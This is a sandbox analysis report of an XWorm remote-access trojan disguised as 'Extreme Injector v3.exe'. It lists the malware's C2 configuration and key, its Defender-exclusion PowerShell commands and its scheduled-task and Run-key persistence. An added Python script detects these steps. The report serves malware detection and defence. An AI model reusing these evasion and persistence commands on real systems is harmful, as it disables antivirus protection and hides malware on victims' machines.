
Windows Analysis Report
Extreme Injector v3.exe

Overview

General Information

Sample name: Extreme Injector v3.exe
Analysis ID: 1582591
MD5: c55baf4bb32f9fe3d218f67ca63ca5b8
SHA1: 7c527e04b3e4ebaa8394600221a1fcebe7695be8
SHA256: defb2c3ab19f9abf691eb50b39d3407eb0157d67bcec4c3f73f261e9b5400c96
Tags: exe, xworm, user-aachum

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Extreme Injector v3.exe (PID: 7412 cmdline: "C:\Users\user\Desktop\Extreme Injector v3.exe" MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
    • powershell.exe (PID: 7520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Extreme Injector v3.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5544 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7608 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
  • svchost.exe (PID: 7932 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
  • svchost.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
  • svchost.exe (PID: 4284 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: C55BAF4BB32F9FE3D218F67CA63CA5B8)
  • cleanup
Malware Configuration

{"C2 url": ["or-officials.gl.at.ply.gg"], "Port": 43985, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara Overview

Initial Sample

Source: Extreme Injector v3.exe | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: Extreme Injector v3.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: Extreme Injector v3.exe | Rule: rat_win_xworm_v3 | Description: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
  • 0x9fbb:$str01: $VB$Local_Port
  • 0xa006:$str02: $VB$Local_Host
  • 0x8a15:$str03: get_Jpeg
  • 0x8e8d:$str04: get_ServicePack
  • 0xaee6:$str05: Select * from AntivirusProduct
  • 0xb358:$str06: PCRestart
  • 0xb36c:$str07: shutdown.exe /f /r /t 0
  • 0xb41e:$str08: StopReport
  • 0xb3f4:$str09: StopDDos
  • 0xb4ea:$str10: sendPlugin
  • 0xb56a:$str11: OfflineKeylogger Not Enabled
  • 0xb6a4:$str12: -ExecutionPolicy Bypass -File "
  • 0xb98b:$str13: Content-length: 5235
Source: Extreme Injector v3.exe | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0xac70:$s6: VirtualBox
  • 0xabce:$s8: Win32_ComputerSystem
  • 0xbb78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xbc15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xbd2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb8a6:$cnc4: POST / HTTP/1.1

Dropped Files

Source: C:\Users\user\AppData\Roaming\svchost.exe | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\svchost.exe | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: C:\Users\user\AppData\Roaming\svchost.exe | Rule: rat_win_xworm_v3 | Description: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
  • 0x9fbb:$str01: $VB$Local_Port
  • 0xa006:$str02: $VB$Local_Host
  • 0x8a15:$str03: get_Jpeg
  • 0x8e8d:$str04: get_ServicePack
  • 0xaee6:$str05: Select * from AntivirusProduct
  • 0xb358:$str06: PCRestart
  • 0xb36c:$str07: shutdown.exe /f /r /t 0
  • 0xb41e:$str08: StopReport
  • 0xb3f4:$str09: StopDDos
  • 0xb4ea:$str10: sendPlugin
  • 0xb56a:$str11: OfflineKeylogger Not Enabled
  • 0xb6a4:$str12: -ExecutionPolicy Bypass -File "
  • 0xb98b:$str13: Content-length: 5235
Source: C:\Users\user\AppData\Roaming\svchost.exe | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0xac70:$s6: VirtualBox
  • 0xabce:$s8: Win32_ComputerSystem
  • 0xbb78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xbc15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xbd2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb8a6:$cnc4: POST / HTTP/1.1

Memory Dumps

Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000000.00000002.2923795440.0000000002652000.00000004.00000800.00020000.00000000.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0x18520:$s6: VirtualBox
  • 0x1847e:$s8: Win32_ComputerSystem
  • 0x19428:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x194c5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x195da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x19156:$cnc4: POST / HTTP/1.1
Source: 00000000.00000002.2923795440.0000000002591000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 00000000.00000000.1645308645.0000000000362000.00000002.00000001.01000000.00000003.sdmp | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0xaa70:$s6: VirtualBox
  • 0xa9ce:$s8: Win32_ComputerSystem
  • 0xb978:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xba15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xbb2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb6a6:$cnc4: POST / HTTP/1.1
(1 further entry not shown in this export)

Unpacked PEs

Source: 0.0.Extreme Injector v3.exe.360000.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
Source: 0.0.Extreme Injector v3.exe.360000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security
Source: 0.0.Extreme Injector v3.exe.360000.0.unpack | Rule: rat_win_xworm_v3 | Description: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
  • 0x9fbb:$str01: $VB$Local_Port
  • 0xa006:$str02: $VB$Local_Host
  • 0x8a15:$str03: get_Jpeg
  • 0x8e8d:$str04: get_ServicePack
  • 0xaee6:$str05: Select * from AntivirusProduct
  • 0xb358:$str06: PCRestart
  • 0xb36c:$str07: shutdown.exe /f /r /t 0
  • 0xb41e:$str08: StopReport
  • 0xb3f4:$str09: StopDDos
  • 0xb4ea:$str10: sendPlugin
  • 0xb56a:$str11: OfflineKeylogger Not Enabled
  • 0xb6a4:$str12: -ExecutionPolicy Bypass -File "
  • 0xb98b:$str13: Content-length: 5235
Source: 0.0.Extreme Injector v3.exe.360000.0.unpack | Rule: MALWARE_Win_AsyncRAT | Description: Detects AsyncRAT | Author: ditekSHen
  • 0xac70:$s6: VirtualBox
  • 0xabce:$s8: Win32_ComputerSystem
  • 0xbb78:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xbc15:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xbd2a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xb8a6:$cnc4: POST / HTTP/1.1
Source: 0.2.Extreme Injector v3.exe.265f8b0.0.unpack | Rule: JoeSecurity_XWorm | Description: Yara detected XWorm | Author: Joe Security
(6 further entries not shown in this export)

                      System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\Extreme Injector v3.exe, ProcessId: 7412, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', ProcessId: 7520, ProcessName: powershell.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7608, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7608, ProcessName: svchost.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', ProcessId: 7520, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Extreme Injector v3.exe, ProcessId: 7412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', ProcessId: 7520, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\Extreme Injector v3.exe, ProcessId: 7412, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 5544, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Extreme Injector v3.exe', ProcessId: 7520, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7608, ProcessName: svchost.exe

                      Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Extreme Injector v3.exe", ParentImage: C:\Users\user\Desktop\Extreme Injector v3.exe, ParentProcessId: 7412, ParentProcessName: Extreme Injector v3.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe", ProcessId: 5544, ProcessName: schtasks.exe
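The process tree and the Sigma matches above give the whole defence-evasion and persistence sequence in four command lines: powershell.exe launched with -ExecutionPolicy Bypass to run Add-MpPreference, excluding both the original path and the dropped copy (by path and by process name) from Defender; a scheduled task named "svchost" that re-launches C:\Users\user\AppData\Roaming\svchost.exe every minute at the highest run level; and the same file registered under the CurrentVersion\Run key and as a Startup-folder .lnk. The script below is an added example, not Joe Sandbox code and not part of this report: it re-implements those checks over process-creation events constructed from the command lines shown above. The Sysmon-style image/command-line fields, the list of system-process names, the "user-writable path" rule and the benign control event (pid 1000) are assumptions. It also decodes -EncodedCommand before looking for MpPreference, so the base64-encoded variant that the "Powershell Base64 Encoded MpPreference Cmdlet" Sigma rule targets is caught as well.

```python
"""Triage of process-creation events for the defence-evasion and persistence
steps in this report.  Added example, not Joe Sandbox code.  Event fields
(image, command_line) mirror Sysmon Event ID 1; the log source is assumed."""
import base64
import re
from dataclasses import dataclass

# Binaries that only legitimately run from the Windows system directories (assumption).
SYSTEM_PROCESS_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
                        "smss.exe", "services.exe", "wininit.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Add-/Set-MpPreference with any -Exclusion* parameter, as in the report's four powershell.exe calls.
MPPREF_RE = re.compile(r"(?:add|set)-mppreference\b.*?-exclusion(?:path|process|extension)\b", re.I)
# -ExecutionPolicy Bypass, plus the -ex / -exec / -ep abbreviations powershell.exe accepts.
EXEC_POLICY_RE = re.compile(r"-(?:ex\w*|ep)\s+bypass\b", re.I)
# -EncodedCommand <base64> and its -e / -ec / -enc abbreviations.
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# The /tr action of schtasks, quoted or bare.
TASK_TARGET_RE = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)


@dataclass
class ProcessEvent:
    pid: int
    image: str
    command_line: str


def encode_powershell(script):
    """Base64 of UTF-16LE, the form powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decoded_command_line(cmd):
    """Append the decoded payload of any -EncodedCommand argument to cmd."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError: not valid base64
        return cmd


def defender_exclusion_added(cmd):
    return MPPREF_RE.search(decoded_command_line(cmd)) is not None


def execution_policy_bypassed(cmd):
    return EXEC_POLICY_RE.search(cmd) is not None


def scheduled_task_target(cmd):
    """Action path of a `schtasks /create` command line, or None."""
    if not re.search(r"\bschtasks(?:\.exe)?\b.*?/create\b", cmd, re.I):
        return None
    m = TASK_TARGET_RE.search(cmd)
    return (m.group(1) or m.group(2)) if m else None


def is_user_writable(path):
    p = path.lower()
    return p.startswith("c:\\users\\") or "\\programdata\\" in p or "\\temp\\" in p


def minute_task_to_user_path(cmd):
    """A task on a minute schedule whose action lives in a user-writable path."""
    target = scheduled_task_target(cmd)
    return (target is not None
            and re.search(r"/sc\s+minute\b", cmd, re.I) is not None
            and is_user_writable(target))


def system_name_outside_system_dir(image):
    p = image.lower()
    return p.rsplit("\\", 1)[-1] in SYSTEM_PROCESS_NAMES and not p.startswith(SYSTEM_DIRS)


def triage(events):
    """pid -> matched behaviour tags; pids with no match are omitted."""
    checks = (
        ("defender_exclusion", lambda e: defender_exclusion_added(e.command_line)),
        ("execpolicy_bypass", lambda e: execution_policy_bypassed(e.command_line)),
        ("minute_task_to_user_path", lambda e: minute_task_to_user_path(e.command_line)),
        ("system_name_outside_system_dir", lambda e: system_name_outside_system_dir(e.image)),
    )
    hits = {}
    for ev in events:
        tags = [tag for tag, check in checks if check(ev)]
        if tags:
            hits[ev.pid] = tags
    return hits


# Constructed from the report's process tree, plus one benign control (pid 1000,
# a real svchost.exe under System32) that must stay unflagged.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
DROPPED = "C:\\Users\\user\\AppData\\Roaming\\svchost.exe"
SAMPLE_EVENTS = [
    ProcessEvent(7412, "C:\\Users\\user\\Desktop\\Extreme Injector v3.exe",
                 "\"C:\\Users\\user\\Desktop\\Extreme Injector v3.exe\""),
    ProcessEvent(7520, PS, f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "
                           "'C:\\Users\\user\\Desktop\\Extreme Injector v3.exe'"),
    ProcessEvent(3444, PS, f"\"{PS}\" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'"),
    ProcessEvent(5544, "C:\\Windows\\System32\\schtasks.exe",
                 "\"C:\\Windows\\System32\\schtasks.exe\" /create /f /RL HIGHEST /sc minute /mo 1 "
                 f"/tn \"svchost\" /tr \"{DROPPED}\""),
    ProcessEvent(7608, DROPPED, DROPPED),
    ProcessEvent(1000, "C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"),
]
```

triage(SAMPLE_EVENTS) flags pids 7520, 3444, 5544 and 7608 and leaves the parent and the System32 control unflagged. The task check deliberately ignores the task name: "svchost" is chosen precisely to blend in, so the useful signals are the minute schedule and an action path under the user profile.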
Timestamp: 2024-12-31T00:49:24.694825+0100 | SID: 2855924 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source: 192.168.2.4:49823 | Destination: 147.185.221.24:43985 | Protocol: TCP


                      AV Detection

Source: Extreme Injector v3.exe | Avira: detected
Source: or-officials.gl.at.ply.gg | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\svchost.exe | Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: Extreme Injector v3.exe | Malware Configuration Extractor: Xworm {"C2 url": ["or-officials.gl.at.ply.gg"], "Port": 43985, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\svchost.exe | ReversingLabs: Detection: 78%
Source: Extreme Injector v3.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\svchost.exe | Joe Sandbox ML: detected
Source: Extreme Injector v3.exe | Joe Sandbox ML: detected
Source: Extreme Injector v3.exe | String decryptor: or-officials.gl.at.ply.gg
Source: Extreme Injector v3.exe | String decryptor: 43985
Source: Extreme Injector v3.exe | String decryptor: <123456789>
Source: Extreme Injector v3.exe | String decryptor: <Xwormmm>
